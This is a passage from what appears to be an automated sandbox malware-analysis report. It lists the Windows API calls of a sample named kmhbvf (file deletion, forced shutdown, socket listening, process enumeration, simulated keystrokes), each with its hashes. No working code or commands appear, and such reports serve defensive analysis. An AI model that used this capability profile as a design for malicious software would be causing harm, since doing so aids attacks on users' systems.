                                                                  • _wcscmp.LIBCMT ref: 00F3FAC7
                                                                  • _wcscmp.LIBCMT ref: 00F3FAE2
                                                                  • FindNextFileW.KERNEL32(?,?), ref: 00F3FB80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                  • String ID: *.*
                                                                  • API String ID: 2185952417-438819550
                                                                  • Opcode ID: 7232ceb2be10d8ff816f587e37d6a4ecb77cc20c455002eb9fa924d26e3e374c
                                                                  • Instruction ID: c7ff49dac1d58508852ddddb8535ce640240f0e2880f9fd718bec543144981f8
                                                                  • Opcode Fuzzy Hash: 7232ceb2be10d8ff816f587e37d6a4ecb77cc20c455002eb9fa924d26e3e374c
                                                                  • Instruction Fuzzy Hash: C9415EB1D4021E9FCF14DF64CC59AEEBBB5FF45360F244566E814A22A1EB309A88DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EF0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE2A58,?,00008000), ref: 00EF02A4
                                                                    • Part of subcall function 00F34FEC: GetFileAttributesW.KERNEL32(?,00F33BFE), ref: 00F34FED
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00F3407C
                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F340CC
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F340DD
                                                                  • FindClose.KERNEL32(00000000), ref: 00F340F4
                                                                  • FindClose.KERNEL32(00000000), ref: 00F340FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                  • String ID: \*.*
                                                                  • API String ID: 2649000838-1173974218
                                                                  • Opcode ID: 2c8ea3c95ec539a9c3f3f6708482015215eb6ea8ffb2291e643aadb0bae49604
                                                                  • Instruction ID: ee747b5a97ba44a1c84fcdf997471008dc5f42b7012ea99488e0584e5cd845cf
                                                                  • Opcode Fuzzy Hash: 2c8ea3c95ec539a9c3f3f6708482015215eb6ea8ffb2291e643aadb0bae49604
                                                                  • Instruction Fuzzy Hash: BF31AF710083899BC304EF60C8918AFB7E8BE95324F441E5DF5E193192EB30EA09E763
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F29399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F293E3
                                                                    • Part of subcall function 00F29399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F29410
                                                                    • Part of subcall function 00F29399: GetLastError.KERNEL32 ref: 00F2941D
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00F357B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-194228
                                                                  • Opcode ID: 1f06c475b5e948d3e3a31df5c1dd857226e8c0df38376265293e74ceed0a8a16
                                                                  • Instruction ID: 43965cf4cecfdca2020bc74e6887250707e02f5cf7225d465df3609ef444ef4a
                                                                  • Opcode Fuzzy Hash: 1f06c475b5e948d3e3a31df5c1dd857226e8c0df38376265293e74ceed0a8a16
                                                                  • Instruction Fuzzy Hash: 65012B72B5572EEAE72862A4DC8BFBB725CEB84F70F240525F813D21D2DA945C00B160
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00F469C7
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F469D6
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00F469F2
                                                                  • listen.WSOCK32(00000000,00000005), ref: 00F46A01
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F46A1B
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00F46A2F
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1279440585-0
                                                                  • Opcode ID: 8bf6a46defe911c50d4db5c2da5bfe76405407259ab429521aac45c732f42b0b
                                                                  • Instruction ID: d608b4cec725ebea2edf191cf489a32a4af2e385dfae439c91ba42c2b262306d
                                                                  • Opcode Fuzzy Hash: 8bf6a46defe911c50d4db5c2da5bfe76405407259ab429521aac45c732f42b0b
                                                                  • Instruction Fuzzy Hash: 2821C1716006049FCB00EF64CC89A6EB7F9EF45720F108559E826A73D1CB74AC01EB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00ED1DD6
                                                                  • GetSysColor.USER32(0000000F), ref: 00ED1E2A
                                                                  • SetBkColor.GDI32(?,00000000), ref: 00ED1E3D
                                                                    • Part of subcall function 00ED166C: DefDlgProcW.USER32(?,00000020,?), ref: 00ED16B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ColorProc$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 3744519093-0
                                                                  • Opcode ID: a3fc68121f12f9504a4a6ad4393115458e9687cd544393507b55b83f28377036
                                                                  • Instruction ID: d0e545cded80d7c74ed562c635b32ff675123f4fafdffef953d2fb420fdd1a2e
                                                                  • Opcode Fuzzy Hash: a3fc68121f12f9504a4a6ad4393115458e9687cd544393507b55b83f28377036
                                                                  • Instruction Fuzzy Hash: 0AA1477011A604BEE6286B695C49EBF369EDB41317B24614BF842F63D1CB249D03F276
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00F3C329
                                                                  • _wcscmp.LIBCMT ref: 00F3C359
                                                                  • _wcscmp.LIBCMT ref: 00F3C36E
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00F3C37F
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F3C3AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 2387731787-0
                                                                  • Opcode ID: 4b8fe78abc8cd3c7dc264da2cb1eef9efa050c3f4e96bdc840bb54cde06e2b1a
                                                                  • Instruction ID: 2987878654d49b80792772d295c00c9290dbcec169d0ff1aee594b6617751497
                                                                  • Opcode Fuzzy Hash: 4b8fe78abc8cd3c7dc264da2cb1eef9efa050c3f4e96bdc840bb54cde06e2b1a
                                                                  • Instruction Fuzzy Hash: 77518B76A046068FC714DF68D890EAAB3E4FF49320F10465EE956EB3A1DB30ED05DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F48475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F484A0
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F46E89
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F46EB2
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00F46EEB
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F46EF8
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00F46F0C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 99427753-0
                                                                  • Opcode ID: 97975a4aecefed1e96f0ad1b1448130ed67807a99c98f33e7fbf22cbf81a17e1
                                                                  • Instruction ID: aeba44ab781907f92ca00ed3e9414c9884c1286d9ae33a673ef3226fae606fe8
                                                                  • Opcode Fuzzy Hash: 97975a4aecefed1e96f0ad1b1448130ed67807a99c98f33e7fbf22cbf81a17e1
                                                                  • Instruction Fuzzy Hash: F541E3B5600214AFDB10AF64DC86F6E77E9DF58710F00845DF916AB3D2DA709D029BA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  • Opcode ID: 4bbe62853a935bcd90eca97e16638b3dd880ee13aacfe01170048abaa6b4a2ab
                                                                  • Instruction ID: b2dfaebe1c41a9935ea282e5807acfa821e2e1acce3285aea5b3edd2890318f3
                                                                  • Opcode Fuzzy Hash: 4bbe62853a935bcd90eca97e16638b3dd880ee13aacfe01170048abaa6b4a2ab
                                                                  • Instruction Fuzzy Hash: C01104727009159FE7212F26DC94A2F7B99EF84B32B144129FD06D7241DF78DD02AAE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00F1027A,?), ref: 00F4C6E7
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F4C6F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                  • API String ID: 2574300362-1816364905
                                                                  • Opcode ID: 5c0ea12dc931080c1fdc71354746f1ab441c726bf626e817179fe3c8c1ecd5a6
                                                                  • Instruction ID: f6ac06778eba55c98d0abfe70d02959cff6d2cc7e475d4f4e7c940b1e2129ddd
                                                                  • Opcode Fuzzy Hash: 5c0ea12dc931080c1fdc71354746f1ab441c726bf626e817179fe3c8c1ecd5a6
                                                                  • Instruction Fuzzy Hash: D6E0C2389013038FD7205B26CC48A537AD4FF04324B60982AED95C2250DBB0C840AF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: LocalTime__swprintf
                                                                  • String ID: %.3d$WIN_XPe
                                                                  • API String ID: 2070861257-2409531811
                                                                  • Opcode ID: 340107d7caee8b9a1f3b1b772b558aa65834bb44dac80892780704f9fd5a9510
                                                                  • Instruction ID: 60ba9d0ab8d221fda871a766ade75583b5130e2befc78d31160976efc73399fb
                                                                  • Opcode Fuzzy Hash: 340107d7caee8b9a1f3b1b772b558aa65834bb44dac80892780704f9fd5a9510
                                                                  • Instruction Fuzzy Hash: 36D0EC63808109EAC7089BA0C854EFA737CAB08300F204052F546A2040EAB586D8BB22
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00F3416D
                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00F3417B
                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00F3419B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F34245
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                  • String ID:
                                                                  • API String ID: 420147892-0
                                                                  • Opcode ID: 3001333c83544d2315557902a57449f9410bce4c7b134e0b7e1fe1eef8fc6ce5
                                                                  • Instruction ID: b742e2c6373d0067f9a9941f0541c890feb486619802188a4b67d9408b5a1e48
                                                                  • Opcode Fuzzy Hash: 3001333c83544d2315557902a57449f9410bce4c7b134e0b7e1fe1eef8fc6ce5
                                                                  • Instruction Fuzzy Hash: 6C31D4711083459FC300EF51D885AAFBBE8BF95360F10092DF595E21A1EBB0E989DB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00F42AAD
                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F42AE4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                  • String ID:
                                                                  • API String ID: 599397726-0
                                                                  • Opcode ID: 8cd7f38488d8361b68ec61c20ae3cfaa0b5053a3635619971f019241a1d2f047
                                                                  • Instruction ID: 729a51b47b2b085923f64d743fc1246b9318ddcce216ac4dcce32798657b4a60
                                                                  • Opcode Fuzzy Hash: 8cd7f38488d8361b68ec61c20ae3cfaa0b5053a3635619971f019241a1d2f047
                                                                  • Instruction Fuzzy Hash: 6941D772A00209BFEB60DE55CC85FBBBBFCEB40764F50407AFE05A6141DAB49E41A660
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EF0FE6: std::exception::exception.LIBCMT ref: 00EF101C
                                                                    • Part of subcall function 00EF0FE6: __CxxThrowException@8.LIBCMT ref: 00EF1031
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F293E3
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F29410
                                                                  • GetLastError.KERNEL32 ref: 00F2941D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1922334811-0
                                                                  • Opcode ID: 534f3c88a320aac8183d6ed7286f7f33c3409b1e169eaafc9211395101b4119e
                                                                  • Instruction ID: d06eac264b7ef7a0b53a00010a83e3cb640f73dc604c24da1e229700c61e2048
                                                                  • Opcode Fuzzy Hash: 534f3c88a320aac8183d6ed7286f7f33c3409b1e169eaafc9211395101b4119e
                                                                  • Instruction Fuzzy Hash: 2B118FB2918209BFD728EF54EC85D2BB7FCEB44710B20856EE45993241EBB0AC41DB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F342FF
                                                                  • DeviceIoControl.KERNEL32 ref: 00F3433C
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00F34345
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                  • String ID:
                                                                  • API String ID: 33631002-0
                                                                  • Opcode ID: 18a175ff0bfcae97fdb11f37b9e6dcbc625649918aeab09fa377720e22995d4a
                                                                  • Instruction ID: c05ba26512ba3d4d6893bf7eb8eac7b50b6d48607118b1a5f9c246ad7c988e4d
                                                                  • Opcode Fuzzy Hash: 18a175ff0bfcae97fdb11f37b9e6dcbc625649918aeab09fa377720e22995d4a
                                                                  • Instruction Fuzzy Hash: 651182B2D00229BEE7109BE89C44FAFB7BCEB09720F100556F924E7190C2B4AD4097A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F34F45
                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00F34F5C
                                                                  • FreeSid.ADVAPI32(?), ref: 00F34F6C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                  • String ID:
                                                                  • API String ID: 3429775523-0
                                                                  • Opcode ID: 63f13e80acf41d32d33534cd7d8823989b3e0683f5deb45460bcc40b8946d49f
                                                                  • Instruction ID: d2c050fe2d2df05e70c61e694672ad648b95685b1bd8dfb1372c5a369f04a06c
                                                                  • Opcode Fuzzy Hash: 63f13e80acf41d32d33534cd7d8823989b3e0683f5deb45460bcc40b8946d49f
                                                                  • Instruction Fuzzy Hash: 6CF03775A1120CBFDB00DFE09D89AAEBBB8EB08211F1044A9E901E2180E6746A049B50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F31B01
                                                                  • keybd_event.USER32 ref: 00F31B14
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: InputSendkeybd_event
                                                                  • String ID:
                                                                  • API String ID: 3536248340-0
                                                                  • Opcode ID: 560e4557e0ccaa408fad190a55c464250066c2b35fb4b549c0dcb4f0bbcd4315
                                                                  • Instruction ID: adca4e7b069001453a0e954ee0a4e4bd2b53f3ddd487171061e3cca0e4abb9e5
                                                                  • Opcode Fuzzy Hash: 560e4557e0ccaa408fad190a55c464250066c2b35fb4b549c0dcb4f0bbcd4315
